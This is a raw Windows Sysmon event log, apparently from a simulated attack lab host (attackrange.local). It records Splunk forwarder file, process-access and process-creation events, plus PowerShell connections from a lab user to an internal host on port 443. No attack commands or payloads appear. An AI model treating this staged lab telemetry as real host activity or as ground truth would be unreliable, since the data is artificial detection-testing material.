Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C62BE77610A570B1E7845E9747E6C8B,SHA256=E5A98EBF71AE4448129EB476CF0903A455B98E51B5F1F3763FB8910C0F372508,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:04.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ECBB19E80F05379EFA664EE7324EE62,SHA256=3717E7AC146F855CD93B96FC72874B474A2F680A8211D3330BA15DECEAD99784,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:28.308{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62013-false10.0.1.12-8000- 23542300x800000000000000035127324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:05.813{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DAFC815F3D84B5C3AA1E8BF047C4301C,SHA256=697A5E97EC548DD5BD64DE8847B68C64A3CDAE1FB3F6BF5465BB244A8A356C55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:05.760{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707F58FDB916BFD91B272CFA6EB72E9C,SHA256=884279424CF3D53FD688FCC5CF714CB03653A201893669A14319B083A386C431,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:06.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9777D607FE4D9C915429C5C8E915C3D,SHA256=16C3A3349B401D7654E8796AA15A3699C5679BF4490D71C76CF2C1CB62458CD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:30.955{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62014-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:07.775{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5BDD47072DE96575BEE01AB6F014EA,SHA256=3D6007EDA3CA66A29E642ED9E3B57E2F49258B1D1FED10FFC6B58DDC6429F83C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:08.793{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC733F99C7CD9190CD22FFDDF3CB8A5,SHA256=D342928494EA31562D8C78765999FD890B25094B5ACA5069387B255E80939A7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:33.322{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62015-false10.0.1.12-8000- 23542300x800000000000000035127329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:09.811{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=470BE27FD464BCD928A65C54AC6B1D5F,SHA256=3E0BDF7F3C2613FE34D9CC3599B76621E1F08AC086CB797E730BDEF0B46370FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.892{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2FFACACC0524439A5FAA49FFEEB888CF,SHA256=AC902AA7B13B3F286075FA65A23EF086D1C476A3E318DC231F8667FA0EDFA0CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F1713133FD589CE7DC130D8F0C6B1A9,SHA256=5F812F430BC1BC56A0CD018DAC9F07D21D667134A8955EC50B51BABFE895D289,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.541{B81B27B7-8246-613A-A896-03000000C801}41602844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.392{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8246-613A-A896-03000000C801}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.390{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.390{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.390{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.389{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.389{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8246-613A-A896-03000000C801}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.389{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8246-613A-A896-03000000C801}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:10.374{B81B27B7-8246-613A-A896-03000000C801}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:35.967{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62016-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.871{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662B2BAC65C97554A56047223CC0D09D,SHA256=9B27591C5F56351C74E94BD44844D7119DB2E6FFD4AD286E682B5CB63D5F3ED9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.425{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=040CF3FAE5F322D9F0BEF7ECA4C74A3F,SHA256=D0E2842E602968CBC3C3BDA677777AAC25BAD50B76BB56E8D59B65853206CB9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.425{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EB0F4802671923EBF03228F675D6D44,SHA256=3DF810D0E90DC3B9AA6528FBD76D127BB1F64E8EE72CDFEE5B76B166FFF1431F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.093{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8247-613A-A996-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.091{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.091{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.090{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.090{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.090{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8247-613A-A996-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.090{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8247-613A-A996-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:11.073{B81B27B7-8247-613A-A996-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:12.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36F770956A44E7E92340D4A3E76985A7,SHA256=C26FE760AA8E29D62203643A050C9128DC1CDDBCA31CC96C10C225D191078AAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:38.386{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62017-false10.0.1.12-8000- 23542300x800000000000000035127355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:13.940{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C16034A4987D30560E87B10D1AF9E6C,SHA256=495D182BA67BA61C85BFB21B1940CD6975F60454A29307DEB0DDEFC317BC918D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:14.954{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4162A0F284FAC3D1827D82935EC2ED59,SHA256=2F2526BDD5E57498CB941FA30760FADCEB3AF480D1A5CE227B0D2BC3CA3A9FA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:15.969{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E05719FE4C6A8DDC6912936DC365209,SHA256=7B8CD88EDAFFA4D4733B3D98734D4BB281AA1D29CE16BF6741C03E95145C35CF,IMPHASH=00000000000000000000000000000000falsefalse - 